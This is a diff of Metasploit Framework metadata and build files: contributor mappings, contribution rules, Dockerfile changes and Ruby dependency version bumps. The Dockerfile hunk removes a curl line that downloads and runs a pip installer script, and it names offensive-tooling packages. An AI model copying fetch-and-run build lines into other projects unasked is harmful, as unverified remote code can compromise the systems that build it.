+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/python_flask_cookie_signer.md:99
@@ -17,6 +17,7 @@ todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
 dledda-r7 <dledda-r7@github>           <diego_ledda@rapid7.com>
+msutovsky-r7 <msutovsky-r7@github>     <martin_sutovsky@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -121,6 +122,7 @@ m-1-k-3 <m-1-k-3@github>               Michael Messner <devnull@s3cur1ty.de>
 Meatballs1 <Meatballs1@github>         <eat_meatballs@hotmail.co.uk>
 Meatballs1 <Meatballs1@github>         <Meatballs1@users.noreply.github.com>
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
+mwalas-r7 <mwalas-r7@github>           <marcin_walas@rapid7.com>
 net-ninja <net-ninja@github.com>       Steven Seeley <steventhomasseeley@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk>
@@ -185,4 +187,4 @@ Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
@@ -1 +1 @@
-3.1.5
+3.2.5
@@ -22,6 +22,8 @@ Once you have finished your new module and tested it locally to ensure it's work
 Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
 will be closed. We need to ensure the code we're adding to master is written to a high standard.

+## Expedited Module Creation Process
+We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.

 ### Code Contribution Do's & Don'ts:

@@ -40,13 +42,18 @@ Keeping the following in mind gives your contribution the best chance of landing
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** list [verification steps] so your code is testable.
+* **Do** test your code.
+* **Do** list [verification steps] so committers can test your code.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
+* **Don't** include sensitive information in your PR (including externally-routable IP addresses in documentation).
+* **Don't** PR untested/unvalidated code you copy/pasted from the internet.
+* **Don't** PR untested/unvalidated code you copy/pasted from AI or LLM.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 * **Don't** post questions in older closed PRs.

 #### <u>New Modules</u>
+* **Do** check the issue tracker to see if there is a `suggestion-module` issue for the module you want to write, and assign yourself to it if there is.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
 * **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2020, Rapid7, Inc.
+Copyright (C) 2006-2025, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -1,7 +1,7 @@
-FROM ruby:3.1.6-alpine3.20 AS builder
+FROM ruby:3.2.5-alpine3.20 AS builder
 LABEL maintainer="Rapid7"

-ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_CONFIG_ARGS="set force_ruby_platform 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
 ARG BUNDLER_FORCE_CLEAN="true"
 ENV APP_HOME=/usr/src/metasploit-framework
 ENV TOOLS_HOME=/usr/src/tools
@@ -53,7 +53,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.1.5-alpine3.18
+FROM ruby:3.2.5-alpine3.20
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -65,8 +65,8 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
-    postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
+RUN apk add --no-cache curl bash sqlite-libs nmap nmap-scripts nmap-nselibs \
+    postgresql-libs python3 py3-pip py3-impacket py3-requests ncurses libcap su-exec alpine-sdk \
    openssl-dev nasm
 RUN\
    if [ "${TARGETARCH}" = "arm64" ];\
@@ -74,7 +74,6 @@ RUN\
    else apk add --no-cache mingw-w64-gcc;\
    fi

-
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)

@@ -86,9 +85,6 @@ RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
-RUN pip install impacket
-RUN pip install requests

 ENV GOPATH=$TOOLS_HOME/go
 ENV GOROOT=$TOOLS_HOME/bin/go
@@ -24,7 +24,7 @@ group :development do
  # memory profiling
  gem 'memory_profiler'
  # cpu profiling
-  gem 'ruby-prof', '1.4.2'
+  gem 'ruby-prof'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
  # gem 'metasploit-aggregator'
@@ -38,7 +38,7 @@ group :development, :test do
  gem 'rspec-rails'
  gem 'rspec-rerun'
  # Required during CI as well local development
-  gem 'rubocop'
+  gem 'rubocop', '1.75.6'
 end

 group :test do
@@ -1,12 +1,12 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.32)
+    metasploit-framework (6.4.65)
      aarch64
      abbrev
-      actionpack (~> 7.0.0)
-      activerecord (~> 7.0.0)
-      activesupport (~> 7.0.0)
+      actionpack (~> 7.1.0)
+      activerecord (~> 7.1.0)
+      activesupport (~> 7.1.0)
      aws-sdk-ec2
      aws-sdk-ec2instanceconnect
      aws-sdk-iam
@@ -15,14 +15,17 @@ PATH
      base64
      bcrypt
      bcrypt_pbkdf
+      benchmark
      bigdecimal
      bootsnap
      bson
      chunky_png
+      concurrent-ruby (= 1.3.4)
      csv
      dnsruby
      drb
      ed25519
+      elftools
      em-http-request
      eventmachine
      faker
@@ -30,6 +33,7 @@ PATH
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
+      fiddle
      filesize
      getoptlong
      hrr_rb_ssh-ed25519
@@ -41,9 +45,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.183)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.32)
+      metasploit-payloads (= 2.0.191)
+      metasploit_data_models (>= 6.0.7)
+      metasploit_payloads-mettle (= 1.0.35)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -59,6 +63,7 @@ PATH
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
+      ostruct
      packetfu
      patch_finder
      pcaprub
@@ -66,7 +71,7 @@ PATH
      pg
      puma
      railties
-      rasn1
+      rasn1 (= 0.14.0)
      rb-readline
      recog
      redcarpet
@@ -89,9 +94,10 @@ PATH
      rex-struct2
      rex-text
      rex-zip
+      rinda
      ruby-macho
      ruby-mysql
-      ruby_smb (~> 3.3.3)
+      ruby_smb (~> 3.3.15)
      rubyntlm
      rubyzip
      sinatra
@@ -113,119 +119,138 @@ PATH
 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.1.1)
+    Ascii85 (2.0.1)
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.0.8.4)
-      actionview (= 7.0.8.4)
-      activesupport (= 7.0.8.4)
-      rack (~> 2.0, >= 2.2.4)
+    actionpack (7.1.5.1)
+      actionview (= 7.1.5.1)
+      activesupport (= 7.1.5.1)
+      nokogiri (>= 1.8.5)
+      racc
+      rack (>= 2.2.4)
+      rack-session (>= 1.0.1)
      rack-test (>= 0.6.3)
-      rails-dom-testing (~> 2.0)
-      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.8.4)
-      activesupport (= 7.0.8.4)
+      rails-dom-testing (~> 2.2)
+      rails-html-sanitizer (~> 1.6)
+    actionview (7.1.5.1)
+      activesupport (= 7.1.5.1)
      builder (~> 3.1)
-      erubi (~> 1.4)
-      rails-dom-testing (~> 2.0)
-      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.8.4)
-      activesupport (= 7.0.8.4)
-    activerecord (7.0.8.4)
-      activemodel (= 7.0.8.4)
-      activesupport (= 7.0.8.4)
-    activesupport (7.0.8.4)
+      erubi (~> 1.11)
+      rails-dom-testing (~> 2.2)
+      rails-html-sanitizer (~> 1.6)
+    activemodel (7.1.5.1)
+      activesupport (= 7.1.5.1)
+    activerecord (7.1.5.1)
+      activemodel (= 7.1.5.1)
+      activesupport (= 7.1.5.1)
+      timeout (>= 0.4.0)
+    activesupport (7.1.5.1)
+      base64
+      benchmark (>= 0.3)
+      bigdecimal
      concurrent-ruby (~> 1.0, >= 1.0.2)
+      connection_pool (>= 2.2.5)
+      drb
      i18n (>= 1.6, < 2)
+      logger (>= 1.4.2)
      minitest (>= 5.1)
+      mutex_m
+      securerandom (>= 0.3)
      tzinfo (~> 2.0)
-    addressable (2.8.6)
-      public_suffix (>= 2.0.2, < 6.0)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
-    allure-rspec (2.24.5)
-      allure-ruby-commons (= 2.24.5)
+    allure-rspec (2.26.0)
+      allure-ruby-commons (= 2.26.0)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.24.5)
+    allure-ruby-commons (2.26.0)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
-      uuid (>= 2.3, < 3)
-    arel-helpers (2.14.0)
-      activerecord (>= 3.1.0, < 8)
-    ast (2.4.2)
-    aws-eventstream (1.3.0)
-    aws-partitions (1.941.0)
-    aws-sdk-core (3.197.0)
+    arel-helpers (2.16.0)
+      activerecord (>= 3.1.0, < 8.1)
+    ast (2.4.3)
+    aws-eventstream (1.3.2)
+    aws-partitions (1.1065.0)
+    aws-sdk-core (3.220.1)
      aws-eventstream (~> 1, >= 1.3.0)
-      aws-partitions (~> 1, >= 1.651.0)
-      aws-sigv4 (~> 1.8)
+      aws-partitions (~> 1, >= 1.992.0)
+      aws-sigv4 (~> 1.9)
+      base64
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.460.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-ec2instanceconnect (1.41.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.99.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.83.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.152.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
+    aws-sdk-ec2 (1.511.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-ec2instanceconnect (1.55.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-iam (1.119.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-kms (1.99.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-s3 (1.182.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.8)
-    aws-sdk-ssm (1.170.0)
-      aws-sdk-core (~> 3, >= 3.197.0)
-      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.8.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-ssm (1.191.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
+      aws-sigv4 (~> 1.5)
+    aws-sigv4 (1.11.0)
      aws-eventstream (~> 1, >= 1.0.2)
    base64 (0.2.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
-    bigdecimal (3.1.8)
+    benchmark (0.4.0)
+    bigdecimal (3.1.9)
    bindata (2.4.15)
-    bootsnap (1.18.3)
+    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (5.0.0)
+    bson (5.0.2)
    builder (3.3.0)
    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
    concurrent-ruby (1.3.4)
+    connection_pool (2.5.0)
    cookiejar (0.3.4)
    crass (1.0.6)
-    csv (3.3.0)
+    csv (3.3.2)
    daemons (1.4.1)
-    date (3.3.4)
+    date (3.4.1)
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
-    diff-lcs (1.5.1)
-    dnsruby (1.72.1)
+    diff-lcs (1.6.0)
+    dnsruby (1.72.4)
+      base64 (~> 0.2.0)
+      logger (~> 1.6.5)
      simpleidn (~> 0.2.1)
-    docile (1.4.0)
+    docile (1.4.1)
    domain_name (0.6.20240107)
    drb (2.2.1)
    ed25519 (1.3.0)
+    elftools (1.3.1)
+      bindata (~> 2)
    em-http-request (1.1.7)
      addressable (>= 2.3.4)
      cookiejar (!= 0.3.1)
      em-socksify (>= 0.3)
      eventmachine (>= 1.0.3)
      http_parser.rb (>= 0.6.0)
-    em-socksify (0.3.2)
+    em-socksify (0.3.3)
+      base64
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.13.0)
+    erubi (1.13.1)
    eventmachine (1.2.7)
-    factory_bot (6.4.6)
-      activesupport (>= 5.0.0)
-    factory_bot_rails (6.4.3)
-      factory_bot (~> 6.4)
+    factory_bot (6.5.1)
+      activesupport (>= 6.1.0)
+    factory_bot_rails (6.4.4)
+      factory_bot (~> 6.5)
      railties (>= 5.0.0)
-    faker (3.4.1)
+    faker (3.5.1)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.11)
      base64
@@ -238,8 +263,10 @@ GEM
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
    ffi (1.16.3)
+    fiddle (1.1.6)
    filesize (0.2.0)
    fivemat (1.3.7)
+    forwardable (1.3.3)
    getoptlong (0.2.1)
    gssapi (1.3.1)
      ffi (>= 1.0.1)
@@ -251,52 +278,58 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.6)
+    http-cookie (1.0.8)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
-    httpclient (2.8.3)
-    i18n (1.14.5)
+    httpclient (2.9.0)
+      mutex_m
+    i18n (1.14.7)
      concurrent-ruby (~> 1.0)
-    io-console (0.7.2)
+    io-console (0.8.0)
+    ipaddr (1.2.7)
    irb (1.7.4)
      reline (>= 0.3.6)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.7.2)
-    language_server-protocol (3.17.0.3)
+    json (2.10.2)
+    language_server-protocol (3.17.0.5)
+    lint_roller (1.1.0)
    little-plugger (1.1.4)
+    logger (1.6.6)
    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.22.0)
+    loofah (2.24.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
-    macaddr (1.7.2)
-      systemu (~> 2.6.5)
-    memory_profiler (1.0.1)
+    memory_profiler (1.1.0)
    metasm (1.0.5)
-    metasploit-concern (5.0.2)
+    metasploit-concern (5.0.4)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.9)
+    metasploit-credential (6.0.16)
+      bigdecimal
+      csv
+      drb
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
+      mutex_m
      net-ssh
      pg
      railties
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (5.0.2)
+    metasploit-model (5.0.3)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.183)
-    metasploit_data_models (6.0.3)
+    metasploit-payloads (2.0.191)
+    metasploit_data_models (6.0.9)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -306,21 +339,22 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.32)
+    metasploit_payloads-mettle (1.0.35)
    method_source (1.1.0)
-    mime-types (3.5.2)
+    mime-types (3.6.0)
+      logger
      mime-types-data (~> 3.2015)
-    mime-types-data (3.2024.0604)
-    mini_portile2 (2.8.7)
-    minitest (5.25.1)
+    mime-types-data (3.2025.0304)
+    mini_portile2 (2.8.8)
+    minitest (5.25.5)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
-    mustermann (3.0.0)
+    mustermann (3.0.3)
      ruby2_keywords (~> 0.0.1)
-    mutex_m (0.2.0)
+    mutex_m (0.3.0)
    nessus_rest (0.1.6)
-    net-imap (0.4.12)
+    net-imap (0.5.6)
      date
      net-protocol
    net-ldap (0.19.0)
@@ -328,16 +362,16 @@ GEM
      timeout
    net-sftp (4.0.0)
      net-ssh (>= 5.0.0, < 8.0.0)
-    net-smtp (0.5.0)
+    net-smtp (0.5.1)
      net-protocol
-    net-ssh (7.2.3)
+    net-ssh (7.3.0)
    network_interface (0.0.4)
    nexpose (7.3.0)
-    nio4r (2.7.3)
-    nokogiri (1.16.7)
+    nio4r (2.7.4)
+    nokogiri (1.18.3)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
-    nori (2.7.0)
+    nori (2.7.1)
      bigdecimal
    octokit (4.25.1)
      faraday (>= 1, < 3)
@@ -345,172 +379,187 @@ GEM
    openssl-ccm (1.2.3)
    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
+    ostruct (0.6.1)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
-    parallel (1.24.0)
-    parser (3.3.2.0)
+    parallel (1.27.0)
+    parser (3.3.8.0)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
    pcaprub (0.13.3)
-    pdf-reader (2.12.0)
-      Ascii85 (~> 1.0)
+    pdf-reader (2.14.1)
+      Ascii85 (>= 1.0, < 3.0, != 2.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.5.6)
+    pg (1.5.9)
+    prism (1.4.0)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.5)
-    puma (6.4.2)
+    public_suffix (6.0.1)
+    puma (6.6.0)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.9)
+    rack (2.2.13)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
-    rack-test (2.1.0)
+    rack-session (1.0.2)
+      rack (< 3)
+    rack-test (2.2.0)
      rack (>= 1.3)
+    rackup (1.0.1)
+      rack (< 3)
+      webrick
    rails-dom-testing (2.2.0)
      activesupport (>= 5.0.0)
      minitest
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.6.0)
+    rails-html-sanitizer (1.6.2)
      loofah (~> 2.21)
-      nokogiri (~> 1.14)
-    railties (7.0.8.4)
-      actionpack (= 7.0.8.4)
-      activesupport (= 7.0.8.4)
-      method_source
+      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
+    railties (7.1.5.1)
+      actionpack (= 7.1.5.1)
+      activesupport (= 7.1.5.1)
+      irb
+      rackup (>= 1.0.0)
      rake (>= 12.2)
-      thor (~> 1.0)
-      zeitwerk (~> 2.5)
+      thor (~> 1.0, >= 1.2.2)
+      zeitwerk (~> 2.6)
    rainbow (3.1.1)
    rake (13.2.1)
-    rasn1 (0.13.0)
+    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.5)
+    recog (3.1.14)
      nokogiri
-    redcarpet (3.6.0)
-    regexp_parser (2.9.2)
-    reline (0.5.8)
+    redcarpet (3.6.1)
+    regexp_parser (2.10.0)
+    reline (0.6.0)
      io-console (~> 0.5)
    require_all (3.0.0)
-    rex-arch (0.1.16)
+    rex-arch (0.1.18)
      rex-text
-    rex-bin_tools (0.1.9)
+    rex-bin_tools (0.1.10)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.32)
-    rex-encoder (0.1.7)
+    rex-core (0.1.34)
+    rex-encoder (0.1.8)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.39)
+    rex-exploitation (0.1.41)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
      rexml
-    rex-java (0.1.7)
-    rex-mime (0.1.8)
+    rex-java (0.1.8)
+    rex-mime (0.1.11)
      rex-text
-    rex-nop (0.1.3)
+    rex-nop (0.1.4)
      rex-arch
-    rex-ole (0.1.8)
+    rex-ole (0.1.9)
      rex-text
-    rex-powershell (0.1.99)
+    rex-powershell (0.1.101)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.12)
+    rex-random_identifier (0.1.15)
      rex-text
-    rex-registry (0.1.5)
-    rex-rop_builder (0.1.5)
+    rex-registry (0.1.6)
+    rex-rop_builder (0.1.6)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.57)
+    rex-socket (0.1.61)
+      dnsruby
      rex-core
-    rex-sslscan (0.1.10)
+    rex-sslscan (0.1.13)
      rex-core
      rex-socket
      rex-text
-    rex-struct2 (0.1.4)
-    rex-text (0.2.58)
-    rex-zip (0.1.5)
+    rex-struct2 (0.1.5)
+    rex-text (0.2.61)
+      bigdecimal
+    rex-zip (0.1.6)
      rex-text
-    rexml (3.3.6)
-      strscan
+    rexml (3.4.1)
+    rinda (0.2.0)
+      drb
+      forwardable
+      ipaddr
    rkelly-remix (0.0.7)
    rspec (3.13.0)
      rspec-core (~> 3.13.0)
      rspec-expectations (~> 3.13.0)
      rspec-mocks (~> 3.13.0)
-    rspec-core (3.13.0)
+    rspec-core (3.13.3)
      rspec-support (~> 3.13.0)
-    rspec-expectations (3.13.2)
+    rspec-expectations (3.13.3)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-mocks (3.13.1)
+    rspec-mocks (3.13.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (6.1.4)
-      actionpack (>= 6.1)
-      activesupport (>= 6.1)
-      railties (>= 6.1)
+    rspec-rails (7.1.1)
+      actionpack (>= 7.0)
+      activesupport (>= 7.0)
+      railties (>= 7.0)
      rspec-core (~> 3.13)
      rspec-expectations (~> 3.13)
      rspec-mocks (~> 3.13)
      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.1)
-    rubocop (1.64.1)
+    rspec-support (3.13.2)
+    rubocop (1.75.6)
      json (~> 2.3)
-      language_server-protocol (>= 3.17.0)
+      language_server-protocol (~> 3.17.0.2)
+      lint_roller (~> 1.1.0)
      parallel (~> 1.10)
      parser (>= 3.3.0.2)
      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.8, < 3.0)
-      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.31.1, < 2.0)
+      regexp_parser (>= 2.9.3, < 3.0)
+      rubocop-ast (>= 1.44.0, < 2.0)
      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.31.3)
-      parser (>= 3.3.1.0)
-    ruby-macho (4.0.1)
-    ruby-mysql (4.1.0)
-    ruby-prof (1.4.2)
+      unicode-display_width (>= 2.4.0, < 4.0)
+    rubocop-ast (1.44.1)
+      parser (>= 3.3.7.2)
+      prism (~> 1.4)
+    ruby-macho (4.1.0)
+    ruby-mysql (4.2.0)
+    ruby-prof (1.7.1)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.10)
+    ruby_smb (3.3.15)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
-      rubyntlm
+      rubyntlm (>= 0.6.5)
      windows_error (>= 0.1.4)
-    rubyntlm (0.6.4)
+    rubyntlm (0.6.5)
      base64
-    rubyzip (2.3.2)
+    rubyzip (2.4.1)
    sawyer (0.9.2)
      addressable (>= 2.3.5)
      faraday (>= 0.17.3, < 3)
+    securerandom (0.4.1)
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
-    simplecov-html (0.12.3)
+    simplecov-html (0.13.1)
    simpleidn (0.2.3)
    sinatra (3.2.0)
      mustermann (~> 3.0)
@@ -521,52 +570,52 @@ GEM
      mini_portile2 (~> 2.8.0)
    sshkey (3.0.0)
    strptime (0.2.5)
-    strscan (3.1.0)
    swagger-blocks (3.0.0)
-    systemu (2.6.5)
-    test-prof (1.3.3)
+    test-prof (1.4.4)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.3.1)
-    tilt (2.3.0)
-    timecop (0.9.9)
-    timeout (0.4.1)
+    thor (1.3.2)
+    tilt (2.6.0)
+    timecop (0.9.10)
+    timeout (0.4.3)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2024.1)
+    tzinfo-data (1.2025.1)
      tzinfo (>= 1.0.0)
-    unicode-display_width (2.5.0)
+    unicode-display_width (3.1.4)
+      unicode-emoji (~> 4.0, >= 4.0.4)
+    unicode-emoji (4.0.4)
    unix-crypt (1.3.1)
-    uuid (2.3.9)
-      macaddr (~> 1.0)
    warden (1.2.9)
      rack (>= 2.0.9)
-    webrick (1.8.1)
-    websocket-driver (0.7.6)
+    webrick (1.9.1)
+    websocket-driver (0.7.7)
+      base64
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
    windows_error (0.1.5)
-    winrm (2.3.6)
+    winrm (2.3.9)
      builder (>= 2.1.2)
      erubi (~> 1.8)
      gssapi (~> 1.2)
      gyoku (~> 1.0)
      httpclient (~> 2.2, >= 2.2.0.2)
      logging (>= 1.6.1, < 3.0)
-      nori (~> 2.0)
+      nori (~> 2.0, >= 2.7.1)
+      rexml (~> 3.0)
      rubyntlm (~> 0.6.0, >= 0.6.3)
    xdr (3.0.3)
      activemodel (>= 4.2, < 8.0)
      activesupport (>= 4.2, < 8.0)
    xmlrpc (0.3.3)
      webrick
-    yard (0.9.36)
-    zeitwerk (2.6.17)
+    yard (0.9.37)
+    zeitwerk (2.7.2)

 PLATFORMS
  ruby
@@ -584,8 +633,8 @@ DEPENDENCIES
  redcarpet
  rspec-rails
  rspec-rerun
-  rubocop
-  ruby-prof (= 1.4.2)
+  rubocop (= 1.75.6)
+  ruby-prof
  simplecov (= 0.18.2)
  test-prof
